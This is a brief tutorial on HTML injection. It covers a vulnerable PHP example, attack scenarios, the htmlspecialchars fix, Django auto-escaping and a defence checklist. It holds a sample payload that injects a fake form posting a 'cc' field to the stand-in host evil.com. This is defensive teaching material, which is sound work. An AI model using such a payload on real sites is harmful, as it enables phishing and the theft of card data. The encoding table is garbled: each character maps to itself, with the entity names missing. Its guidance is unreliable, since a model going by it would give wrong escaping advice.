HTML Injection

HTML injection occurs when unsanitized user input is rendered as HTML markup in a browser — but without JavaScript execution. Unlike XSS, the attacker cannot execute scripts, but they can still inject malicious HTML elements.

Vulnerable example (PHP):

echo "Welcome, " . $_GET["name"];

An attacker sends: ?name=<h1>Site Hacked</h1><form action=http://evil.com><input name=cc></form>

The browser renders a fake login form overlaid on the real page. The victim sees what appears to be a legitimate form but submits their data to the attacker.

Common HTML injection scenarios:

• Fake error messages with phishing links
• Overlaying login forms to steal credentials
• Injecting <meta> refresh redirects
• Defacing page content to damage reputation

The fix is to HTML-encode all user-supplied output so that markup characters are displayed as text, not interpreted as HTML.

Encoding required for HTML context:

• & → &
• < → <
• > → >
• " → "
• ' → '

Safe output (PHP):

echo "Welcome, " . htmlspecialchars($_GET["name"], ENT_QUOTES, "UTF-8");

Framework auto-escaping:

# Django templates auto-escape by default
{{ name }}  {# safe #}
{{ name|safe }}  {# UNSAFE — bypasses escaping #}

Defense checklist:

• HTML-encode all user output placed into HTML context
• Use templating engines with auto-escaping enabled
• Never use raw/safe/noescape filters with untrusted input
• Apply context-appropriate encoding (HTML, JS, URL, CSS are different)